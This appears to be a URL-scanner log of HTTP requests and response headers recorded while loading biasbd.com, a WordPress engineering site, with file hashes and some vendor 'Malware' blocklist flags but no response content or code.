                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
last-modified: Tue, 25 Dec 2018 05:41:38 GMT
etag: "8aaf-5c21c312-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 9866
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (32004)
Size:   9866
Md5:    45b6e9c3bb08e0e74f9d9e738bf95011
Sha1:   a9946063b6a32bd95fe9cae75f8632e4c56c590c
Sha256: 691322524f1e6e1634ead2eb07421f8aea3b3342d3e6322efb10a15270a5315c

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/uploads/2018/12/BIAS-250x48.png HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: image/png
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
last-modified: Tue, 25 Dec 2018 13:25:26 GMT
etag: "5cf6-5c222fc6-0;;;"
accept-ranges: bytes
content-length: 23798
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  PNG image data, 250 x 48, 8-bit/color RGBA, non-interlaced\012- data
Size:   23798
Md5:    83da6cb7cade509322192bb616f9531e
Sha1:   0ded5573a6adc73c7e023c5450eea60f6c2d4d1d
Sha256: c4ccfa7e05d3737a7dbd33c906ddac12d76928fe3b9bddb133bca4081905e455
                                        
                                            GET /wp-content/uploads/2018/12/Footer-Logo.png HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: image/png
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
last-modified: Tue, 25 Dec 2018 16:43:48 GMT
etag: "5cdb-5c225e44-0;;;"
accept-ranges: bytes
content-length: 23771
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  PNG image data, 250 x 48, 8-bit/color RGBA, non-interlaced\012- data
Size:   23771
Md5:    416feb62cde2930c989636a326a7103f
Sha1:   8aaa81a4ce1998074ed1d17c10df350306952c5b
Sha256: 562715b9bbb4b2632f475d44a3132c29af1c1b5f9da1f85067cba728df7b5daf
                                        
                                            GET /wp-content/uploads/2018/12/BIAS-Logo-Mobile.png HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: image/png
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
last-modified: Tue, 25 Dec 2018 13:41:14 GMT
etag: "4422-5c22337a-0;;;"
accept-ranges: bytes
content-length: 17442
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  PNG image data, 250 x 48, 8-bit colormap, non-interlaced\012- data
Size:   17442
Md5:    ad04d43a7265b80f4f034f7589e21a42
Sha1:   7fd6f9f3dc7c283d18f3cf83211f71f506ec78a9
Sha256: 0eefe54009aa11413adbc18b91f5397d7ce428b2f6cd6c9df15c209a6e018a7e
                                        
                                            GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Referer: http://biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.5
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/font-woff2
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
etag: "12d68-5c21c312-0;;;"
accept-ranges: bytes
content-length: 77160
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 77160, version 4.459\012- data
Size:   77160
Md5:    af7ae505a9eed503f8b8e6982036873e
Sha1:   d6f48cba7d076fb6f2fd6ba993a75b9dc1ecbf0c
Sha256: 2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 27 Sep 2022 06:18:41 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /player_api HTTP/1.1 
Host: www.youtube.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         216.58.211.14
HTTP/2 200 OK
content-type: text/javascript; charset=utf-8
                                        
x-content-type-options: nosniff
expires: Tue, 27 Sep 2022 06:18:41 GMT
date: Tue, 27 Sep 2022 06:18:41 GMT
cache-control: private, max-age=0
strict-transport-security: max-age=31536000
x-frame-options: SAMEORIGIN
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube_main"
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
report-to: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
content-encoding: br
server: ESF
x-xss-protection: 0
set-cookie: YSC=L7Rg-QWjFOo; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none VISITOR_INFO1_LIVE=3BTxdzVsoYQ; Domain=.youtube.com; Expires=Sun, 26-Mar-2023 06:18:41 GMT; Path=/; Secure; HttpOnly; SameSite=none CONSENT=PENDING+825; expires=Thu, 26-Sep-2024 06:18:41 GMT; path=/; domain=.youtube.com; Secure
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (509)
Size:   957
Md5:    e7ddbdec5abd9278eb9ac4a52619fbd2
Sha1:   d2a7f6dab1e8f5d91816fdd357927f76bd2187b4
Sha256: 198d77c34f57f34f181ed133e1cafe2350de29594fd4f43cfb927072f92d9486
                                        
                                            GET /wp-content/uploads/2018/12/icon_7Lz_icon.ico HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: image/x-icon
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:41 GMT
etag: "c2dd-5c2233da-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 49923
date: Tue, 27 Sep 2022 06:18:41 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  MS Windows icon resource - 1 icon, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel\012- data
Size:   49923
Md5:    716b7a5fa64090c844c34233b52e9dce
Sha1:   5fd691493d90f48a68d7796f036d00de66b8e4e1
Sha256: 5948d456a850b34097aebca14298086e473a6a91a243c562777799a24609fdc1

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /water-tube-boiler-working-principle-types-of-water-tube-boilers/ HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
X-Moz: prefetch
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/html; charset=UTF-8
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
last-modified: Tue, 27 Sep 2022 06:18:41 GMT
etag: "3b113cadf4cf9113666709d2d14c5000"
transfer-encoding: chunked
content-encoding: gzip
vary: Accept-Encoding
date: Tue, 27 Sep 2022 06:18:41 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (16918), with CRLF, LF line terminators
Size:   33767
Md5:    0c9b4071216ee5bf543b861f3a8dde30
Sha1:   615343449ccfb250bbc9e0df9294f204cc143251
Sha256: b1ee6b46d1703d785e0c621e665dc8cf78aac6dd69a83b1a006094f39c88e9af

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /?wc-ajax=get_refreshed_fragments HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 18
Origin: http://biasbd.com
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/json; charset=UTF-8
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
access-control-allow-origin: *
access-control-allow-credentials: true
x-content-type-options: nosniff
x-robots-tag: noindex
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-transform, no-cache, must-revalidate, max-age=0
content-length: 273
content-encoding: gzip
vary: Accept-Encoding
date: Tue, 27 Sep 2022 06:18:41 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade


--- Additional Info ---
Magic:  JSON data\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (651), with no line terminators
Size:   273
Md5:    cf1426d78e2f56e4ccc3efa80dff7041
Sha1:   dc32c36de124a6bd7b2b41c848323048106d937a
Sha256: 6be520b9293a64ebea7f2973933b1420e73f489eab9f57d59c7a1443174ded4f
                                        
                                            GET /emojione/2.2.7/lib/js/emojione.min.js HTTP/1.1 
Host: cdn.jsdelivr.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.85.229
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
cache-control: public, max-age=31536000, s-maxage=31536000, immutable
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains; preload
etag: W/"49dda-cp9vjKV4fYl0Ow7X6yf9dkBr+YU"
content-encoding: gzip
accept-ranges: bytes
date: Tue, 27 Sep 2022 06:18:42 GMT
age: 16405879
x-served-by: cache-fra19156-FRA, cache-bma1654-BMA
x-cache: HIT, HIT
vary: Accept-Encoding
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
content-length: 53889
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   103088
Md5:    1b7c6001d974d5843182ba4557d5bda0
Sha1:   52d791cd61b7935c4595e1b28348f9fd2d026593
Sha256: 2abbf4854fd2be5d496352fb7ecc81719773e4d57461acce4b5afa99d9cd0f29
                                        
                                            POST /ca/gsatlasr3dvtlsca2022q1 HTTP/1.1 
Host: ocsp.globalsign.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.18.20.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 27 Sep 2022 06:18:42 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Etag: "FA6ED6F57383FB3D86F153A7EFADC149F45B6C01"
Expires: Tue, 27 Sep 2022 17:00:00 GMT
Last-Modified: Tue, 27 Sep 2022 05:00:00 UTC
Cache-Control: s-maxage=3600, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Age: 1181
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 75121fa128a7b511-OSL


--- Additional Info ---
Magic:  data
Size:   1462
Md5:    608f572ef2722001c859f15d10684a7c
Sha1:   4e50c1a2b04a1a6b6d647fc9f77db2b78c1f28d3
Sha256: f0cb1357150bea57c97f0aa4e5ab5fe6c7eabc37079cb612656194b47f751278
                                        
                                            GET /s/?k=633295c22197f171f6aa6d88&cver=0&pop=false&asver=9&tkn=eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InZpc2l0b3ItYXBwbGljYXRpb24tc2VydmVyLTIwMjEwMjIifQ.eyJwaWQiOiI1YzdhYzhhZmE3MjZmZjJlZWE1YTQ3Y2IiLCJ2aWQiOiJlMTFhNDNmNTliNzBkMmFkYmFlMTBkZDRjOGU3MmQ5YmIxOGM1NGFmMjY4YTliZTMwMWJiYTAwOTkzMzNlNjc5Iiwic2lkIjoiNjMzMjk1YzIyMTk3ZjE3MWY2YWE2ZDg4IiwiaWF0IjoxNjY0MjU5NTIyLCJleHAiOjE2NjQyNjEzMjIsImp0aSI6IndmWVF5ZUpSdmN3bTNpbGxqOGh3YSJ9.oZs8Qea_10km-zK7mYdCBTiM1nvJRAMaXXwOalfl-w3MPTpg9Z0Hk-5npgukBn6Wyf872nWmGskSpcHf3C5aAQ&EIO=3&transport=websocket&__t=ODzcFVE HTTP/1.1 
Host: vsa5.tawk.to
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: http://biasbd.com
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: zCulcYSFzbAXBevN/hgZjw==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         104.22.25.131
HTTP/1.1 101 Switching Protocols
                                        
Date: Tue, 27 Sep 2022 06:18:43 GMT
Connection: upgrade
upgrade: websocket
sec-websocket-accept: Tnuwo8B3u5RxFHO13CiyU7MOwI8=
sec-websocket-extensions: permessage-deflate
strict-transport-security: max-age=0; includeSubDomains; preload
CF-Cache-Status: DYNAMIC
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 75121fa00b37b51d-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  data
Size:   7302
Md5:    5b51ccc7e29e93ecb6a285770cae50bc
Sha1:   76aab7ac8df2066e716c6367babb03a508af7c94
Sha256: bed2c38f6cc397dacf5377ae45d4c0105b8219b4c40dbee4d92b31a7b5f4b7ea
                                        
                                            GET /5c7ac8afa726ff2eea5a47cb/default HTTP/1.1 
Host: embed.tawk.to
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         172.67.38.66
HTTP/2 200 OK
content-type: application/x-javascript
                                        
date: Tue, 27 Sep 2022 06:18:40 GMT
access-control-allow-origin: *
cache-control: public, max-age=7200, s-maxage=3600
etag: W/"stable-v4-63258f417d7"
vary: Accept-Encoding
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
x-content-type-options: nosniff
server: cloudflare
cf-ray: 75121f8fc9ea0afe-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /_s/v4/app/63258f417d7/js/twk-main.js HTTP/1.1 
Host: embed.tawk.to
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.67.38.66
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Tue, 27 Sep 2022 06:18:41 GMT
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"da5bb1dc647470204df0e49f5afac2de"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 75121f97da1f0afe-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /_s/v4/app/63258f417d7/js/twk-vendor.js HTTP/1.1 
Host: embed.tawk.to
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.67.38.66
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Tue, 27 Sep 2022 06:18:41 GMT
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"7dcb496e4882926f93f2e73fa87062c0"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 75121f97da240afe-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /_s/v4/app/63258f417d7/js/twk-chunk-vendors.js HTTP/1.1 
Host: embed.tawk.to
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.67.38.66
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Tue, 27 Sep 2022 06:18:41 GMT
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"81c2642aac0b88b6b237d279f5f8ce67"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 75121f97ea2b0afe-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---